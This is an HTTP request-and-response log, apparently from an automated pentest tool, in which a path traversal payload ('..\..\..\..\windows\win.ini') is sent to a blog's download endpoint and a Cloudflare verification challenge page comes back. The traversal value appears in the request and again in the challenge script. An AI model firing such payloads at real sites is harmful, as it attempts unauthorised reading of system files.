REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?name=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9730
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b8958ada110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=aQ3%2FwMUL%2BCNWhq7j7EiIDTkv%2FmozlENgI6xbkOuilXRSqFonn5xYZEe6tkanAaQCf1R2JrCxuKNu%2FnyijEkzqEZ6EzYwoWrU6cuvj%2BFrCtyuWeNDewsgaIgslh7RhnRoq%2BmAR%2FuyBxIXOkb84w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b8958ada110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'eejTreIWdywKGaW3j6mKswN_Aen_Rcj._sIsyAp9.2Q-1784280674-1.2.1.1-vBX7lNHOvhaElmmEgW_.VUjlo_EA0GSRykoaYwQb8Il8.Da0eWlHR7gtVzLWYSyg',cITimeS: '1784280674',cRay: 'a1c83b8958ada110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?name=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_tk=fXtP4t1hL0Pe85s4JE5xOXXJ62awZhNoaUA8r_ykeRo-1784280674-1.0.1.1-IzB2Y7425fP5cqFTrQ5.RUUCpQmMP3jK.CvCNs9k.Nk",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?name=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_f_tk=fXtP4t1hL0Pe85s4JE5xOXXJ62awZhNoaUA8r_ykeRo-1784280674-1.0.1.1-IzB2Y7425fP5cqFTrQ5.RUUCpQmMP3jK.CvCNs9k.Nk",md: 'rjVURo7d6bjJBD2XSym5kt1MDCL.qm0nO.Y7sdSz39c-1784280674-1.2.1.1-1.q0_aXO2BSz3yp7gP0q5l5990nms09OYAMwtBFbXlvO9FLQ26cl4YqDNO_p.2hO0FbnKwwQl8uPvf9CLl3zh7jjB2NHpKi60arADQpwG6e3QsW5wpO4wCt7DvXsKGc16OT8P7r1NbDH7fLh41rvn9Hm1ThAaXRk66vVC2BbXtgcgwCWDxAsoZ38iNTn5RUM0XcuZzGRo9cM4sRlSzKEllqtKYGcwYiTn2j.ReUZd5rADvUoIJbcuNAc_1UpV3tK2QlLfN.v7QGhNSpvIdX.vEg2v7mS91yVhaR6andULiEa5Is_wE8llMy4D_OoRxAI.4YBFxWBWlemLGPyJT2tIQlrkMIEO5rjFMZ0f9UxUvH2U3ZIqZJQRuLkFMDRTc6HlOKlRpRiEwMz.B2kPekwU8YV52i32m_v3inctDrQzLiuAE.1fAb38P9GQ2Uqxm7ba2aZumzfGYTrDh.gqe6Ex33BBfZfG1fl6y1xTP5ej6LztBDdu1FxugP2Zbchi7FHE1CkQbPa9L8SRlJvsiBhRwwIERHWyANpFyAzhBLK3Rfam50aeu4ttv941fabVrSJQhi2HiVPr0wUmohF.Ku3ZG7RmnNEUlFoK7CcGzGNZf0Vd6o.oPbtCy_R4wGMDN.Jx4HsJcQIL3E7C9.Okp_pIBF_BYzJQpCx8eZYVmI.iJVg8mHhvvBA8x4BCZbH0k1zUG1CAVrGen0b17SKndNfTco_1a8Ytg3JlOKRI_D68v79ouTabDft9gQiEVJ.JP0LaV.jjC6kj18I1fNFMF4VyjmHxBck7H7yC.Ajnau5ynBI55425xpNyuK28gBXU.AAU7i.YR5CZ9TZu6M2IkAg23DJ7k0aN4.GBJ22PffW9w.jVZykl9f.c5a2zSfAynxGOxfDlSED7R0RsxDrnIKAUitR5N5c0NFPdkS4cL6JWBIch5Q4.SLfAYA.y9Z9uxDOuDWjHiLQoZ0KOqhhoZCrq71kfXMP4wj4z7E5raG8G7Aq7w.pesEXjwNNj18zaApB5hFQyy1RM8p.8FRXavrIJug0pvYJOtTxPyLdZOe0vaw4Q1SVgHcwa7tqBQwzbJXQnogxsgRpx2IWlAxmwro2FCI.2DvakgXFWxFmVtQ_kyp8CO_fO0fl9FQQhZBih8sZpJvyMIlpi.i.i.oC99dkK_RTIGw01T6_JJFFm1vCClGrBj.d7YSzKrknpLQtYu1OHAue4o2D0jolPE5EnyhZUzyPKmtyG5ooev2j4bBkw9YTDb4PmAMuXtu5G8D7ZLhyZHC8SosDntkw0qOT7P4MtLnDE0eUFwFErQKdNNCLWJWjtDKSuaI_oUq5KJzDRhS8',mdrd: 'cU6qu06bDOi02HSny02MzDKAGQdGvopvzbmA9KxCBqY-1784280674-1.2.1.1-YirdvBQSQc32IQnMYMyjSqquEVRhHqJEnCFy0_.eoDRAbE.ZiCnlOzp87vPEAH7MXBioubICdcqDJZmrbRCX42coufzQBnPmRrdYr2UglLA8BDL17VK30uJ9quTIlzMh.QsBxdmjPIeENe6X4RwjsIUeMVaSJQNooo9SE_c5ayUGtC.lbbnfq0nqLwWO8UlFjGdMEKDOvipfVUKbOvnCiWsEV6WUfZnNdvCuPNhyrb.r2oNB4OeBeAtrF0oJdLET',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b8958ada110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?name=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_rt_tk=fXtP4t1hL0Pe85s4JE5xOXXJ62awZhNoaUA8r_ykeRo-1784280674-1.0.1.1-IzB2Y7425fP5cqFTrQ5.RUUCpQmMP3jK.CvCNs9k.Nk"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
